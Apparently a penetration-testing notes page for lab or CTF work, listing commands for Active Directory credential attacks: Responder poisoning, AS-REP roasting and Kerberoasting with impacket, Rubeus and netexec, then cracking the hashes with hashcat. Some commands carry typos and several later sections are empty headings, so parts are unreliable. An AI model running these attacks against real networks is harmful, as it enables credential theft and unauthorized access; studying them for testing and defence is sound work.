Attacking Authentication

Here we will discuss different types of attacks which might enable us to authenticate as a domain user and gain initial access.

Important Issues

KRB_AP_ERR_SKEW (Clock skew too great)

Some common issues attacking Kerberos is that the time needs to be the same as on the target. When using an VM the time sync settings is enabled which doesn't allow us to change the time correctly.

timedatectl set-ntp 0

The command above deactivates the time synchronization from the VM with the host.

sudo nptdate -u 10.10.10.100

The command above sets the time to the same as the specified target.

Responder

If we find a form which seems to connect to an server and we can change the server address we might be able to catch some hashes or credentials. For this we will use impacket responder.

sudo responder -I tun0

There are many options we can use with responder. Above is the most basic use.

GitHub - camopants/igandx-Responder: Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.GitHub

ASREPRoast

For the attack to succeed we need valid usernames to check if they lack the Kerberos per-authentication required attribute.

impacket-GetNPUsers target.htb/ -usersfile users.txt -output asrep.hash

We can also use Rubeus to execute the same attack.

Rubeus.exe asreproast /format:hashcat /outfile:asrep.hash

Once we have retrieved the hash we can crack it using the following command:

hashcat -m 18200 hash.txt /usr/share/wordlist/rockyou.txt

Now we should have the password for the hash.

Kerberoasting

To abuse kerberoasting we need to have an active directory account that has a Service Principal Name ("SPN") set.

A SPN is a unique identifier of a service instance. Kerberos authentication uses SPNs to associate a service instance with a service sign-in account. Doing so allows a client application to request service authentication for an account even if the client doesn't have the account name.

In a kerberoasting attack an authenticated user requests a Kerberos Ticket for an SPN (TGS). The retrieved TGS is encrypted with the hash of the service account password.

We have many tools to abuse kerberoasting.

impacket

GetUsersSPN.py test.lab/cub3:password -dc-ip 10.10.10.100 -request

Rubeus

Rubeus.exe kerberoast

netexec

netexec ldap 10.10.10.100 -u cub3-p password --kerberoasting roast.txt

After we retrieved the hash we use hashcat to brute force the password

Cracking

hashcat -m 13100 hash.txt /usr/share/wordlist/rockyou.txt

We should now have the password and access to some new information.

Pass-The-Ticket

Silver Ticket

Golden Ticket

DCSync

PreviousEnumeration NextShadow Credentials

Last updated 1 year ago